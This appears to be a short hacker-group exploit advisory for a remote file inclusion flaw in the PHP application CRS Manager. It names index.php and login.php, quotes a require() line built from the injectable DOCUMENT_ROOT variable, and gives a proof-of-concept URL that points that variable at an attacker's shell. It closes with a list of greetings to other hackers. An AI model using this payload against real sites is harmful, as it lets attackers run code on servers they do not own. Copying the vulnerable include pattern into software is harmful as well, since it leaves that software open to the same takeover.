#######################################
X---- w w w . u N k n 0 w n . e u ----X
#######################################
CRS Manager(crsmanager) Multi Remote File Include
::Home:
http://crsmanager.berlios.de
::Vuln Type :
Remote File Include (RFI)
::Discovered by :
iNs
::Vuln Code:
index.php
login.php
<?php
require ($DOCUMENT_ROOT."/…/admin/settings/conf.php");
PoC:
index.php?DOCUMENT_ROOT=shell??
:: iNs @ uNkn0wn.eu ::
::Gr33tz t0:
uNkn0wn.eu - iD - Stel128 - Spitfire - fEaRz - R1der - Stranger21 - nexos -
sh4m4n - Svarshik
DRT Memb3rz - s[H]4g - deL - l10m - l1l - r00tm1nd - f|_|ck3r - p1mmy
ActiveSpy - r100z - The_PitBull - MaxDeMon - SancheZ - r0x00k - str0ke